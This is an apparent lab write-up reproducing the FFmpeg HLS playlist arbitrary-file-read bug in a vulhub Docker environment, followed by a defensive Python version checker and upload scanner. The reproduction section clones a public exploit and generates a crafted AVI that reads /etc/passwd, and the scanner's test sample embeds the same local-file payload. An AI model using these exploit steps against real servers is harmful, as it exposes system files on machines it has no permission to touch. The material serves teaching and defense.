Vulnerability description
FFmpeg before 2.8.12, 3.0.x and 3.1.x before 3.1.9, 3.2.x before 3.2.6, and 3.3.x before 3.3.2 do not properly restrict HTTP Live Streaming file extensions and demuxer names, which allows attackers to read arbitrary files via crafted playlist data.
For the environment setup, see this article of mine:
https://developer.aliyun.com/article/1113693?spm=a2c6h.26396819.creator-center.8.22fb3e18sKKMLR
The directory is
/vulhub-master/ffmpeg/phdays
Run the commands
docker-compose build
docker-compose up -d
Output
[root@localhost phdays]# docker-compose build
web uses an image, skipping
[root@localhost phdays]# docker-compose up -d
Creating network "phdays_default" with the default driver
Pulling web (vulhub/ffmpeg:3.2.4-with-php)...
Trying to pull repository docker.io/vulhub/ffmpeg ...
3.2.4-with-php: Pulling from docker.io/vulhub/ffmpeg
3192219afd04: Pull complete
a9edd0f1d92a: Pull complete
a281efe2cee1: Pull complete
Digest: sha256:3883006c9e8975361580e2634a78244da37214bda4e986b5b3c81a4b01d8c882
Status: Downloaded newer image for docker.io/vulhub/ffmpeg:3.2.4-with-php
Creating phdays_web_1 ... done
[root@localhost phdays]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
3e74cdeb6dce vulhub/ffmpeg:3.2.4-with-php "php -S 0.0.0.0:80..." 37 seconds ago Up 34 seconds 0.0.0.0:8080->8080/tcp phdays_web_1
Target host: 192.168.0.11:8080
Vulnerability reproduction
Download the exp
git clone https://github.com/neex/ffmpeg-avi-m3u-xbin
cd ffmpeg-avi-m3u-xbin
Generate the payload
./gen_xbin_avi.py file:///etc/passwd exp.avi
This produces exp.avi; upload it at http://your-ip:8080/. The backend transcodes the uploaded video with ffmpeg and displays the result. During transcoding, because of ffmpeg's arbitrary file read vulnerability, the contents of the target file are read into the video.
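From the defender's side, two checks follow directly from the description above: is the installed ffmpeg inside one of the affected version ranges, and does an uploaded "video" carry an HLS playlist or a local-file URI in its bytes before it is handed to ffmpeg for transcoding. The script below is an added example written for this page; it is not code from the vulhub environment, from the exploit repository, or from FFmpeg itself. The version ranges are taken verbatim from the vulnerability description; the marker list (HLS tags and the file: scheme) is my own heuristic, and the two sample byte strings are constructed test inputs, not real uploads.

```python
import re

# Affected ranges exactly as the vulnerability description states them:
# FFmpeg before 2.8.12; 3.0.x and 3.1.x before 3.1.9; 3.2.x before 3.2.6;
# 3.3.x before 3.3.2.  A version v is affected when lowest <= v < fixed.
AFFECTED_RANGES = (
    ((0, 0, 0), (2, 8, 12)),
    ((3, 0, 0), (3, 1, 9)),
    ((3, 2, 0), (3, 2, 6)),
    ((3, 3, 0), (3, 3, 2)),
)

_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text):
    """Extract (major, minor, patch) from a bare version string ("3.2.4",
    "n3.2.4") or from the first line of `ffmpeg -version` output
    ("ffmpeg version 3.2.4 Copyright ...").  A missing patch level is 0.
    Git snapshot builds without a dotted number raise ValueError."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError("no dotted version number found in %r" % text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or "0"))


def is_affected_version(text):
    """True if the version in `text` falls inside any affected range."""
    v = parse_version(text)
    return any(low <= v < fixed for low, fixed in AFFECTED_RANGES)


# Byte markers that a plain video upload has no reason to contain: HLS
# playlist directives and a local-file URI scheme.  Their presence does not
# prove an exploit, but such a file should be rejected rather than passed to
# a transcoder whose playlist handling is known to be unsafe.  (Heuristic
# chosen for this example; not an exhaustive signature.)
SUSPICIOUS_MARKERS = (b"#EXTM3U", b"#EXT-X-", b"#EXTINF", b"file:")


def scan_upload(data):
    """Return the suspicious markers found in an upload's bytes, in the order
    of SUSPICIOUS_MARKERS; an empty list means none were seen.  Matching is
    case-insensitive so mixed-case variants are not missed."""
    lowered = data.lower()
    return [m.decode() for m in SUSPICIOUS_MARKERS if m.lower() in lowered]


# Constructed samples (not real uploads): a minimal RIFF/AVI-looking header,
# once clean and once with playlist text embedded after the header.
CLEAN_SAMPLE = b"RIFF\x00\x10\x00\x00AVI LIST" + b"\x00" * 32
PLAYLIST_SAMPLE = (
    b"RIFF\x00\x10\x00\x00AVI LIST"
    + b"#EXTM3U\n#EXT-X-VERSION:3\n#EXTINF:1,\n"
    + b"file:///etc/passwd\n#EXT-X-ENDLIST\n"
)

if __name__ == "__main__":
    banner = "ffmpeg version 3.2.4 Copyright (c) 2000-2017 the FFmpeg developers"
    print("affected version:", is_affected_version(banner))
    print("clean sample:", scan_upload(CLEAN_SAMPLE))
    print("playlist sample:", scan_upload(PLAYLIST_SAMPLE))
```

Feed `parse_version` the first line of `ffmpeg -version` from the transcoding host (the vulhub image on this page is 3.2.4, which is inside the 3.2.x range) and run `scan_upload` on the raw bytes of every upload before the transcode step. Rejecting flagged uploads is a stopgap; the actual fix is upgrading ffmpeg to a version at or beyond the fixed release for its branch.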